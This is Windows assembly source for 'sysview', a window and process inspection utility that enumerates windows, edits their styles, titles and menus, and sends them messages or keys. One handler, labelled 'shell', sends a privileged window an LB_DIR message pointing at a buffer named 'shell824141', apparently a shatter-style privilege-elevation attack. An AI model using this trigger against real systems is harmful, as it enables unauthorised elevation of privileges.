;##########################################################################
; sysview
; 18.04.2003 - 01.01.2004
; coded by comrade <comrade2k@hotmail.com>
; IRC: #asm, #coders, #win32asm on EFnet
; Web: http://comrade64.cjb.net/
;      http://comrade.win32asm.com/
;##########################################################################
format PE GUI 4.0
entry start
;##########################################################################
_TITLE		equ  "sysview"
_NAME		equ  "sysview"
_VERSION	equ  "0.0"
_VERSIONTEXT	equ  _VERSION
load _BUILDNUM dword from "build.bin":0
_BUILD		equ ((_BUILDNUM / 1000) mod 10 + '0'),((_BUILDNUM / 100) mod 10 + '0'),((_BUILDNUM / 10) mod 10 + '0'),(_BUILDNUM mod 10 + '0')
;##########################################################################
include "%include%/win32am.inc"
include "%include%/equates/kernel32.inc"
include "%include%/equates/user32.inc"
include "%include%/equates/gdi32.inc"
include "%include%/equates/comdlg32.inc"
include "%include%/equates/comctl32.inc"
include "%include%/equates/tlhelp32.inc"
include "tokens.inc"
include "%include%/macro/if.inc"
include "%include%/macro/macros.inc"
OFFSET equ
;##########################################################################
;##########################################################################
macro dddb long,bytes {
	dd long
	db bytes
}
;##########################################################################
;##########################################################################
section ".code" code readable executable
;##########################################################################
start:
;##########################################################################
;##########################################################################
	stdcall [CreateFile],OFFSET szBuildFile,GENERIC_READ+GENERIC_WRITE,0,0,OPEN_ALWAYS,0,0
	push	eax
	stdcall [ReadFile],eax,OFFSET dwValue,4,esp,0
	inc	[dwValue]
	stdcall [SetFilePointer],[esp+0Ch],0,0,FILE_BEGIN
	stdcall [WriteFile],[esp+10h],OFFSET dwValue,4,esp,0
	call	[CloseHandle]
	mov	[iccx.dwSize],08h
	mov	[iccx.dwICC],ICC_LISTVIEW_CLASSES+ICC_TAB_CLASSES
	stdcall [InitCommonControlsEx],iccx
	stdcall [GetModuleHandle],0
	mov	[hInstance],eax
	stdcall [DialogBoxParam],eax,IDD_MAIN,0,OFFSET DlgProc,eax
	stdcall [ExitProcess],0
;##########################################################################
proc DlgProc,hWnd,msg,wParam,lParam
	enter
	push	ebx esi edi
	; find message
	mov	eax,[msg]
	mov	edx,OFFSET mainmsg
.scan:	cmp	eax,[edx]
	jne	@F
	jmp	dword [edx+04h]
@@:	add	edx,08h
	cmp	dword [edx],0
	je	.quit
	jmp	.scan
.initdlg:	; INITDIALOG
	; append "About..." item to system menu
	stdcall [GetSystemMenu],[hWnd],0
	mov	ebx,eax
	mov	[ofn.hwndOwner],eax
	stdcall [AppendMenu],eax,MFT_SEPARATOR,0,0
	stdcall [AppendMenu],ebx,MFT_STRING,10,OFFSET szMenuAbout
	; set icon
	stdcall [LoadIcon],[hInstance],IDI_MAIN
	mov	[hIcon],eax
	stdcall [SendMessage],[hWnd],WM_SETICON,1,eax
	; add tabs to tab control
	mov	[tci.mask],TCIF_TEXT+TCIF_PARAM
	mov	[tci.pszText],OFFSET szTabWindows
	and	[tci.lParam],0		; 0
	stdcall [SendDlgItemMessage],[hWnd],ID_MAIN_TAB,TCM_INSERTITEM,0,OFFSET tci
	mov	[tci.pszText],OFFSET szTabProcesses
	inc	[tci.lParam]		; 1
	stdcall [SendDlgItemMessage],[hWnd],ID_MAIN_TAB,TCM_INSERTITEM,1,OFFSET tci
	mov	[tci.pszText],OFFSET szTabThreads
	add	[tci.lParam],3		; 4
	stdcall [SendDlgItemMessage],[hWnd],ID_MAIN_TAB,TCM_INSERTITEM,2,OFFSET tci
	mov	[tci.pszText],OFFSET szTabModules
	dec	[tci.lParam]		; 3
	stdcall [SendDlgItemMessage],[hWnd],ID_MAIN_TAB,TCM_INSERTITEM,3,OFFSET tci
	mov	[tci.pszText],OFFSET szTabHeaps
	dec	[tci.lParam]		; 2
	stdcall [SendDlgItemMessage],[hWnd],ID_MAIN_TAB,TCM_INSERTITEM,4,OFFSET tci
	; load imagelist
	stdcall [ImageList_Create],16,16,ILC_COLOR8+ILC_MASK,22,22
	mov	[hImageList],eax
	stdcall [LoadBitmap],[hInstance],IDB_IMAGELIST
	push	eax
	stdcall [ImageList_AddMasked],[hImageList],eax,CLR_DEFAULT
	call	[DeleteObject]
	; create fonts
	stdcall [CreateFont],14,0,0,0,FW_NORMAL,0,0,0,DEFAULT_CHARSET,OUT_DEFAULT_PRECIS,CLIP_DEFAULT_PRECIS,DEFAULT_QUALITY,DEFAULT_PITCH+FF_DONTCARE,OFFSET szFontFixed
	mov	[hFontFixed],eax
	jmp	.seltab
.command:	; COMMAND
	mov	eax,[wParam]
	;.if ax,e,ID_MAIN_ABOUT          ; About
	;.endif
	jmp	.quit
.syscommand:	; SYSCOMMAND
	cmp	[wParam],10
	jne	.quit
	stdcall [MessageBox],[hWnd],OFFSET szMsgAbout,OFFSET szAppTitle,MB_OK+MB_ICONASTERISK+MB_APPLMODAL
	jmp	.quit
.notify:	; NOTIFY
	mov	eax,[lParam]
	.if [eax+NMHDR.code],e,TCN_SELCHANGE
	.seltab:; select tab
		mov	ebx,05h
		mov	esi,OFFSET hTabs
	@@:	lodsd
		stdcall [ShowWindow],eax,SW_HIDE
		dec	ebx
		jnz	@B
		stdcall [SendDlgItemMessage],[hWnd],ID_MAIN_TAB,TCM_GETCURSEL,0,0
		mov	edx,OFFSET tci
		mov	[edx+TCITEM.mask],TCIF_PARAM
		stdcall [SendDlgItemMessage],[hWnd],ID_MAIN_TAB,TCM_GETITEM,eax,edx
		mov	ebx,[tci.lParam]
		mov	edx,[hTabs+ebx*4]
		test	edx,edx
		jz	.createtabwnd
		stdcall [ShowWindow],edx,SW_SHOW
		jmp	.quit
.createtabwnd:	; create tabbed child window
		stdcall [CreateDialogParam],[hInstance],[tabs+ebx*8+00h],[hWnd],[tabs+ebx*8+04h],0
		mov	[hTabs+ebx*4],eax
		mov	ebx,eax
		stdcall [GetClientRect],[hWnd],OFFSET rc
		mov	eax,[rc.bottom]
		shl	eax,16
		add	eax,[rc.right]
		stdcall [SendMessage],[hWnd],WM_SIZE,SIZE_RESTORED,eax
		stdcall [SetWindowPos],ebx,HWND_TOP,0,0,0,0,SWP_NOACTIVATE+SWP_NOCOPYBITS+SWP_NOMOVE+SWP_NOSIZE+SWP_SHOWWINDOW
		stdcall [UpdateWindow],ebx
	.endif
	jmp	.quit
.size:		; SIZE
	stdcall [GetDlgItem],[hWnd],ID_MAIN_TAB
	mov	ebx,eax
	movsx	esi,word [lParam+00h]
	movsx	edi,word [lParam+02h]
	sub	esi,4+4
	sub	edi,4+4
	stdcall [MoveWindow],eax,4,4,esi,edi,1
	sub	esi,16+16-8
	sub	edi,36+16-8
	mov	ebx,OFFSET hTabs
	mov	ecx,05h
@@:	push	ecx
	stdcall [MoveWindow],[ebx],16,36,esi,edi,1
	stdcall [RedrawWindow],[ebx],0,0,RDW_INVALIDATE
	add	ebx,04h
	pop	ecx
	loop	@B
	jmp	.quit
.close: 	; CLOSE
	stdcall [DestroyIcon],[hIcon]
	stdcall [ImageList_Destroy], [hImageList]
	stdcall [EndDialog],[hWnd],0
.quit:	xor	eax,eax
	pop	edi esi ebx
	return
;##########################################################################
proc DlgWindowsProc,hWnd,msg,wParam,lParam
	enter
	push	ebx esi edi
	; find message
	mov	eax,[msg]
	mov	edx,OFFSET windowsmsg
.scan:	cmp	eax,[edx]
	jne	@F
	jmp	dword [edx+04h]
@@:	add	edx,08h
	cmp	dword [edx],0
	je	.quit
	jmp	.scan
.initdlg:	; INITDIALOG
	mov	[lvc.mask],LVCF_TEXT
	mov	[lvc.pszText],OFFSET szColHandle
	stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_INSERTCOLUMN,0,OFFSET lvc
	mov	[lvc.pszText],OFFSET szColTitle
	inc	[lvc.iSubItem]
	stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_INSERTCOLUMN,1,OFFSET lvc
	mov	[lvc.pszText],OFFSET szColClass
	inc	[lvc.iSubItem]
	stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_INSERTCOLUMN,2,OFFSET lvc
	stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_SETIMAGELIST,LVSIL_SMALL,[hImageList]
	stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_SETEXTENDEDLISTVIEWSTYLE,0,LVS_EX_FULLROWSELECT+LVS_EX_SUBITEMIMAGES+LVS_EX_HEADERDRAGDROP+LVS_EX_LABELTIP
	stdcall [LoadMenu],[hInstance],IDM_POPUPMENU
	mov	[hMenuPopup],eax
	stdcall [PostMessage],[hWnd],WM_COMMAND,IDM_WIN_REFRESH_VIS,0
	; set hotkey
	stdcall [RegisterHotKey],[hWnd],0,MOD_ALT+MOD_CONTROL,"F"
	stdcall [RegisterHotKey],[hWnd],1,MOD_ALT+MOD_CONTROL,"U"
	; subclass listview
	stdcall [GetDlgItem],[hWnd],ID_WIN_WINDOWS
	mov	ebx,eax
	stdcall [SetWindowLong],ebx,GWL_WNDPROC,OFFSET WndListProc
	stdcall [SetWindowLong],ebx,GWL_USERDATA,eax
	jmp	.quit
.size:		; SIZE
	stdcall [GetDlgItem],[hWnd],ID_WIN_WINDOWS
	movsx	ebx,word [lParam+00h]
	movsx	ecx,word [lParam+02h]
	stdcall [MoveWindow],eax,0,0,ebx,ecx,1
	stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_SETCOLUMNWIDTH,0,72
	sub	ebx,72
	stdcall [GetSystemMetrics],SM_CXDLGFRAME
	add	eax,eax
	sub	ebx,eax
	stdcall [GetSystemMetrics],SM_CXVSCROLL
	sub	ebx,eax
	mov	eax,ebx
	lea	eax,[eax*4+eax]        ; 5/8
	shr	eax,3
	stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_SETCOLUMNWIDTH,1,eax
	mov	eax,ebx
	lea	eax,[eax*2+eax]        ; 3/8
	shr	eax,3
	stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_SETCOLUMNWIDTH,2,eax
	jmp	.quit
.command:	; COMMAND
	mov	eax,[wParam]
	.if ax,e,IDM_WIN_REFRESH_ALL	; refresh all
		stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_DELETEALLITEMS,0,0
		stdcall [GetDlgItem],[hWnd],ID_WIN_WINDOWS
		mov	ebx,eax
		call	[GetDesktopWindow]
		and	[lvi.iItem],0
		stdcall AddWindows,eax,ebx,0,0,0
		stdcall [CheckMenuRadioItem],[hMenuPopup],IDM_WIN_REFRESH_ALL,IDM_WIN_REFRESH_VIS,IDM_WIN_REFRESH_ALL,MF_BYCOMMAND
		jmp	.stdwin
	.elseif ax,e,IDM_WIN_REFRESH_VIS; refresh visible only
		stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_DELETEALLITEMS,0,0
		stdcall [GetDlgItem],[hWnd],ID_WIN_WINDOWS
		mov	ebx,eax
		call	[GetDesktopWindow]
		and	[lvi.iItem],0
		stdcall AddWindows,eax,ebx,1,0,0
		stdcall [CheckMenuRadioItem],[hMenuPopup],IDM_WIN_REFRESH_ALL,IDM_WIN_REFRESH_VIS,IDM_WIN_REFRESH_VIS,MF_BYCOMMAND
		jmp	.stdwin
	.elseif ax,e,IDM_WIN_REFRESH_ALLREC	; refresh all (recurse)
		stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_DELETEALLITEMS,0,0
		stdcall [GetDlgItem],[hWnd],ID_WIN_WINDOWS
		mov	ebx,eax
		call	[GetDesktopWindow]
		and	[lvi.iItem],0
		stdcall AddWindows,eax,ebx,0,0,-1
		stdcall [CheckMenuRadioItem],[hMenuPopup],IDM_WIN_REFRESH_ALLREC,IDM_WIN_REFRESH_VISREC,IDM_WIN_REFRESH_ALLREC,MF_BYCOMMAND
		jmp	.stdwin
	.elseif ax,e,IDM_WIN_REFRESH_VISREC	; refresh visible only (recurse)
		stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_DELETEALLITEMS,0,0
		stdcall [GetDlgItem],[hWnd],ID_WIN_WINDOWS
		mov	ebx,eax
		call	[GetDesktopWindow]
		and	[lvi.iItem],0
		stdcall AddWindows,eax,ebx,1,0,-1
		stdcall [CheckMenuRadioItem],[hMenuPopup],IDM_WIN_REFRESH_ALLREC,IDM_WIN_REFRESH_VISREC,IDM_WIN_REFRESH_VISREC,MF_BYCOMMAND
	.stdwin:mov	[lvi.mask],LVIF_PARAM
		and	[lvi.iItem],0
		and	[lvi.iSubItem],0
		and	[lvi.lParam],0
		stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_INSERTITEM,0,OFFSET lvi
		inc	[lvi.iItem]
		stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_INSERTITEM,0,OFFSET lvi
		xor	[lvi.mask],LVIF_TEXT
		inc	[lvi.iItem]
		mov	[lvi.pszText],OFFSET szSeparator
		stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_INSERTITEM,0,OFFSET lvi
		xor	[lvi.mask],LVIF_PARAM
		sub	[lvi.iItem],2
		inc	[lvi.iSubItem]
		mov	[lvi.pszText],OFFSET szActiveWindow
		stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_SETITEM,0,OFFSET lvi
		inc	[lvi.iItem]
		mov	[lvi.pszText],OFFSET szCursorWindow
		stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_SETITEM,0,OFFSET lvi
		inc	[lvi.iItem]
		mov	[lvi.pszText],OFFSET szSeparator
		stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_SETITEM,0,OFFSET lvi
		inc	[lvi.iSubItem]
		mov	[lvi.pszText],OFFSET szSeparator
		stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_SETITEM,0,OFFSET lvi
	.elseif ax,e,IDM_WIN_STNORM	; normal
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [ShowWindow],eax,SW_SHOW
	.elseif ax,e,IDM_WIN_STMIN	; minimized
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [ShowWindow],eax,SW_MINIMIZE
	.elseif ax,e,IDM_WIN_STMAX	; maximized
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [ShowWindow],eax,SW_MAXIMIZE
	.elseif ax,e,IDM_WIN_ALWAYSONTOP; always on top
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		push	eax
		stdcall [GetMenuState],[hMenuPopup],IDM_WIN_ALWAYSONTOP,MF_BYCOMMAND
		test	eax,MF_CHECKED
		pop	eax
		mov	ecx,HWND_NOTOPMOST
		jnz	@F
		mov	ecx,HWND_TOPMOST
	@@:	stdcall [SetWindowPos],eax,ecx,0,0,0,0,SWP_NOMOVE+SWP_NOSIZE
	.elseif ax,e,IDM_WIN_VISIBLE	; visible
		stdcall [GetMenuState],[hMenuPopup],IDM_WIN_VISIBLE,MF_BYCOMMAND
		test	eax,MF_CHECKED
		push	SW_HIDE
		jnz	@F
		mov	dword [esp],SW_SHOW
	@@:	stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [ShowWindow],eax	; nCmdShow on stack
	.elseif ax,e,IDM_WIN_ENABLED	; enabled
		stdcall [GetMenuState],[hMenuPopup],IDM_WIN_ENABLED,MF_BYCOMMAND
		and	eax,MF_CHECKED
		setz	al
		push	eax
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [EnableWindow],eax	; bEnable on stack
	.elseif ax,e,IDM_WIN_TRANSPARENCY	; transparency
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		mov	[szValue],0
		stdcall InputBox,OFFSET szChangeTransp,OFFSET szValue,20h
		test	eax,eax
		jz	.quit
		stdcall ustr2dw,OFFSET szValue
		test	eax,eax
		jnz	@F
		stdcall [GetWindowLong],ebx,GWL_EXSTYLE
		and	eax,NOT WS_EX_LAYERED
		stdcall [SetWindowLong],ebx,GWL_EXSTYLE,eax
		jmp	.quit
	@@:	push	eax
		stdcall [GetWindowLong],ebx,GWL_EXSTYLE
		or	eax,WS_EX_LAYERED
		stdcall [SetWindowLong],ebx,GWL_EXSTYLE,eax
		pop	eax
		;stdcall [SetLayeredWindowAttributes],ebx,0,eax,LWA_ALPHA
	.elseif ax,e,IDM_WIN_STYLES	; styles
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		stdcall [GetWindowLong],eax,GWL_STYLE
		push	0 styles eax
		stdcall [DialogBoxParam],[hInstance],IDD_FLAGS,[hWnd],OFFSET DlgFlagsProc,esp
		add	esp,0Ch
		stdcall [SetWindowLong],ebx,GWL_STYLE,eax
		stdcall [SetWindowPos],ebx,0,0,0,0,0,SWP_DRAWFRAME+SWP_NOACTIVATE+SWP_NOCOPYBITS+SWP_NOMOVE+SWP_NOSIZE+SWP_NOZORDER
	.elseif ax,e,IDM_WIN_EXSTYLES	; extended styles
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		stdcall [GetWindowLong],eax,GWL_EXSTYLE
		push	0 exstyles eax
		stdcall [DialogBoxParam],[hInstance],IDD_FLAGS,[hWnd],OFFSET DlgFlagsProc,esp
		add	esp,0Ch
		stdcall [SetWindowLong],ebx,GWL_EXSTYLE,eax
		stdcall [SetWindowPos],ebx,0,0,0,0,0,SWP_DRAWFRAME+SWP_NOACTIVATE+SWP_NOCOPYBITS+SWP_NOMOVE+SWP_NOSIZE+SWP_NOZORDER
	.elseif ax,e,IDM_WIN_EDITMENU	; edit menu
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [GetMenu],eax
		stdcall [DialogBoxParam],[hInstance],IDD_MENULIST,[hWnd],OFFSET DlgMenuListProc,eax
	.elseif ax,e,IDM_WIN_EDITSYSMENU; edit system menu
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [GetSystemMenu],eax,0
		stdcall [DialogBoxParam],[hInstance],IDD_MENULIST,[hWnd],OFFSET DlgMenuListProc,eax
	.elseif ax,e,IDM_WIN_EDITTITLE	; edit title
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		stdcall [GetWindowText],eax,OFFSET szTitle,200h
		stdcall InputBox,OFFSET szChangeTitle,OFFSET szTitle,200h
		test	eax,eax
		jz	.quit
		stdcall [SetWindowText],ebx,OFFSET szTitle
	.elseif ax,e,IDM_WIN_CHPOS	; change position
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [DialogBoxParam],[hInstance],IDD_CHPOS,[hWnd],OFFSET DlgChPosProc,eax
		test	eax,eax
		jz	.quit
	.elseif ax,e,IDM_WIN_SENDMSG	; send message
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [DialogBoxParam],[hInstance],IDD_SENDMSG,[hWnd],OFFSET DlgSendMsgProc,eax
	.elseif ax,e,IDM_WIN_SENDKEYS	; send keys
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [DialogBoxParam],[hInstance],IDD_SENDKEYS,[hWnd],OFFSET DlgSendKeysProc,eax
	.elseif ax,e,IDM_WIN_SPECIAL_LISTBOX	; special:listbox
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [DialogBoxParam],[hInstance],IDD_LISTBOX,[hWnd],OFFSET DlgListBoxProc,eax
	.elseif ax,e,IDM_WIN_SPECIAL_COMBOBOX	; special:combobox
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [DialogBoxParam],[hInstance],IDD_COMBOBOX,[hWnd],OFFSET DlgComboBoxProc,eax
	.elseif ax,e,IDM_WIN_SPECIAL_LISTVIEW	; special:listview
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [DialogBoxParam],[hInstance],IDD_LISTVIEW,[hWnd],OFFSET DlgListViewProc,eax
	.elseif ax,e,IDM_WIN_SPECIAL_TREEVIEW	; special:treeview
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [DialogBoxParam],[hInstance],IDD_TREEVIEW,[hWnd],OFFSET DlgTreeViewProc,eax
	.elseif ax,e,IDM_WIN_SPECIAL_TOOLBAR	; special:toolbar
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [DialogBoxParam],[hInstance],IDD_TOOLBAR,[hWnd],OFFSET DlgToolbarProc,eax
	.elseif ax,e,IDM_WIN_SPECIAL_STATUSBAR	; special:statusbar
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [DialogBoxParam],[hInstance],IDD_STATUSBAR,[hWnd],OFFSET DlgStatusbarProc,eax
	.elseif ax,e,IDM_WIN_SPECIAL_TAB	; special:tab
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [DialogBoxParam],[hInstance],IDD_TAB,[hWnd],OFFSET DlgTabProc,eax
	.elseif ax,e,IDM_WIN_COPY_HANDLE	; copy handle to clipboard
		stdcall [GlobalAlloc],GMEM_MOVEABLE+GMEM_DDESHARE,200h
		mov	ebx,eax
		stdcall [GlobalLock],eax
		mov	esi,eax
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		ccall	[wsprintf],esi,OFFSET szHandleFormat,eax
		stdcall [GlobalUnlock],ebx
		call	[CloseClipboard]
		stdcall [OpenClipboard],[hWnd]
		call	[EmptyClipboard]
		stdcall [SetClipboardData],CF_TEXT,ebx
		call	[CloseClipboard]
	.elseif ax,e,IDM_WIN_COPY_ID		; copy id to clipboard
		stdcall [GlobalAlloc],GMEM_MOVEABLE+GMEM_DDESHARE,200h
		mov	ebx,eax
		stdcall [GlobalLock],eax
		mov	esi,eax
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [GetWindowLong],eax,GWL_ID
		ccall	[wsprintf],esi,OFFSET szValueFormat,eax
		stdcall [GlobalUnlock],ebx
		call	[CloseClipboard]
		stdcall [OpenClipboard],[hWnd]
		call	[EmptyClipboard]
		stdcall [SetClipboardData],CF_TEXT,ebx
		call	[CloseClipboard]
	.elseif ax,e,IDM_WIN_COPY_TITLE 	; copy title to clipboard
		stdcall [GlobalAlloc],GMEM_MOVEABLE+GMEM_DDESHARE,200h
		mov	ebx,eax
		stdcall [GlobalLock],eax
		mov	esi,eax
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [GetWindowText],eax,esi,200h
		stdcall [GlobalUnlock],ebx
		call	[CloseClipboard]
		stdcall [OpenClipboard],[hWnd]
		call	[EmptyClipboard]
		stdcall [SetClipboardData],CF_TEXT,ebx
		call	[CloseClipboard]
	.elseif ax,e,IDM_WIN_COPY_CLASS 	; copy class to clipboard
		stdcall [GlobalAlloc],GMEM_MOVEABLE+GMEM_DDESHARE,200h
		mov	ebx,eax
		stdcall [GlobalLock],eax
		mov	esi,eax
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [GetClassName],eax,esi,200h
		stdcall [GlobalUnlock],ebx
		call	[CloseClipboard]
		stdcall [OpenClipboard],[hWnd]
		call	[EmptyClipboard]
		stdcall [SetClipboardData],CF_TEXT,ebx
		call	[CloseClipboard]
	.elseif ax,e,IDM_WIN_SHELL		; shell
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		mov	ebx,eax
		stdcall [GetModuleHandle],OFFSET szLibUser32
		stdcall [GetProcAddress],eax,OFFSET szProcSMW
		stdcall eax,ebx,LB_DIR,0,OFFSET shell824141
	.elseif ax,e,IDM_WIN_DESTROY		; destroy
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [DestroyWindow],eax
	.elseif ax,e,IDM_WIN_QUITTHREAD 	; quit thread
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		push	eax
		stdcall [GetWindowThreadProcessId],eax,esp
		and	dword [esp],0
		stdcall [PostThreadMessage],eax,WM_QUIT,0
	.elseif ax,e,IDM_WIN_CLOSE		; close
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		stdcall [PostMessage],eax,WM_CLOSE,0,0
	.endif
	jmp	.quit
.notify:	; NOTIFY
	cmp	[wParam],ID_WIN_WINDOWS
	jne	.quit
	mov	eax,[lParam]
	.if [eax+NMHDR.code],e,LVN_ITEMCHANGED
		stdcall [SetWindowLong],[hWnd],GWL_USERDATA,[eax+NMLISTVIEW.lParam]
	.elseif [eax+NMHDR.code],e,NM_RCLICK
		cmp	[eax+NMHDR.idFrom],ID_WIN_WINDOWS
		jne	.quit
		stdcall [GetWindowLong],[hWnd],GWL_USERDATA
		test	eax,eax
		mov	ebx,eax
		jz	.quit
		; state
		stdcall [IsIconic],eax
		test	eax,eax
		mov	eax,IDM_WIN_STMIN
		jnz	@F
		stdcall [IsZoomed],ebx
		test	eax,eax
		mov	eax,IDM_WIN_STMAX
		jnz	@F
		mov	eax,IDM_WIN_STNORM
	@@:	stdcall [CheckMenuRadioItem],[hMenuPopup],IDM_WIN_STNORM,IDM_WIN_STMAX,eax,MF_BYCOMMAND
		; always on top
		stdcall [GetWindowLong],ebx,GWL_EXSTYLE
		xor	ecx,ecx
		and	eax,WS_EX_TOPMOST
		mov	eax,MF_UNCHECKED
		jz	@F
		mov	eax,MF_CHECKED
	@@:	or	eax,MF_BYCOMMAND
		stdcall [CheckMenuItem],[hMenuPopup],IDM_WIN_ALWAYSONTOP,eax
		; visible
		stdcall [IsWindowVisible],ebx
		xor	ecx,ecx
		test	eax,eax
		mov	eax,MF_UNCHECKED
		jz	@F
		mov	eax,MF_CHECKED
	@@:	or	eax,MF_BYCOMMAND
		stdcall [CheckMenuItem],[hMenuPopup],IDM_WIN_VISIBLE,eax
		; enabled
		stdcall [IsWindowEnabled],ebx
		xor	ecx,ecx
		test	eax,eax
		mov	eax,MF_UNCHECKED
		jz	@F
		mov	eax,MF_CHECKED
	@@:	or	eax,MF_BYCOMMAND
		stdcall [CheckMenuItem],[hMenuPopup],IDM_WIN_ENABLED,eax
		stdcall [GetCursorPos],OFFSET pt
		stdcall [GetSubMenu],[hMenuPopup],0
		stdcall [TrackPopupMenu],eax,TPM_LEFTALIGN,[pt.x],[pt.y],0,[hWnd],0
	.elseif [eax+NMHDR.code],e,NM_RETURN
		stdcall [MessageBox],[hWnd],szAppTitle,0,0
	.elseif [eax+NMHDR.code],e,LVN_KEYDOWN
		movzx	eax,[eax+LVKEYDOWN.wVKey]
		cmp	eax,VK_ADD
		je	@F
		cmp	eax,VK_SUBTRACT
		je	@F
		jmp	.quit
	.elseif [eax+NMHDR.code],e,NM_DBLCLICK
	@@:	stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_GETNEXTITEM,-1,LVNI_SELECTED
		cmp	eax,-1
		je	.quit
		mov	[lvi.mask],LVIF_IMAGE+LVIF_TEXT+LVIF_INDENT
		mov	[lvi.iItem],eax
		and	[lvi.iSubItem],0
		mov	[lvi.pszText],OFFSET szHandle
		mov	[lvi.cchTextMax],10h
		stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_GETITEM,0,OFFSET lvi
		cmp	[lvi.iImage],IDI_COLLAPSED	; expand item
		je	.exp
		cmp	[lvi.iImage],IDI_EXPANDED	; collapse item
		jne	.quit
		; collapse
		dec	[lvi.iImage]
		stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_SETITEM,0,OFFSET lvi
		xor	[lvi.mask],LVIF_IMAGE+LVIF_TEXT
		inc	[lvi.iItem]
		mov	ebx,[lvi.iIndent]
	@@:	stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_GETITEM,0,OFFSET lvi
		test	eax,eax
		jz	.quit
		cmp	ebx,[lvi.iIndent]
		jae	.quit
		stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_DELETEITEM,[lvi.iItem],0
		jmp	@B
		jmp	.quit
	.exp:	; expand
		inc	[lvi.iImage]
		stdcall [SendDlgItemMessage],[hWnd],ID_WIN_WINDOWS,LVM_SETITEM,0,OFFSET lvi
		stdcall [GetDlgItem],[hWnd],ID_WIN_WINDOWS
		mov	ebx,eax
		stdcall hstr2dw,OFFSET szHandle
		inc	[lvi.iItem]
		inc	[lvi.iIndent]
		stdcall AddWindows,eax,ebx,0,[lvi.iIndent],[lvi.iIndent]
	.elseif [eax+NMHDR.code],e,LVN_COLUMNCLICK
		mov	ecx,[eax+NMLISTVIEW.iSubItem]
		mov	[dwSortColumn],ecx
		stdcall [PostMessage],[eax+NMHDR.hwndFrom],LVM_SORTITEMS,[eax+NMHDR.hwndFrom],OFFSET CompareItems
	.elseif [eax+NMHDR.code],e,NM_CUSTOMDRAW
		mov	ebx,eax
		xor	eax,eax
		cmp	[ebx+NMLVCUSTOMDRAW.nmcd.dwDrawStage],CDDS_PREPAINT
		jne	@F
		mov	eax,CDRF_NOTIFYITEMDRAW
		jmp	.cdset
	@@:	cmp	[ebx+NMLVCUSTOMDRAW.nmcd.dwDrawStage],CDDS_ITEMPREPAINT
		jne	@F
		mov	eax,CDRF_NOTIFYSUBITEMDRAW
		jmp	.cdset
	@@:	cmp	[ebx+NMLVCUSTOMDRAW.nmcd.dwDrawStage],CDDS_SUBITEM OR CDDS_ITEMPREPAINT
		jne	@F
		cmp	[ebx+NMLVCUSTOMDRAW.nmcd.lItemlParam],0
		jne	.cdset
		stdcall [GetSysColor],COLOR_BTNFACE
		mov	[ebx+NMLVCUSTOMDRAW.clrTextBk],eax
		mov	eax,CDRF_NEWFONT
		jmp	.cdset
	 .cdset:stdcall [SetWindowLong],[hWnd],DWL_MSGRESULT,eax
		xor	eax,eax
		inc	eax
		jmp	.ret
	.endif
	jmp	.quit
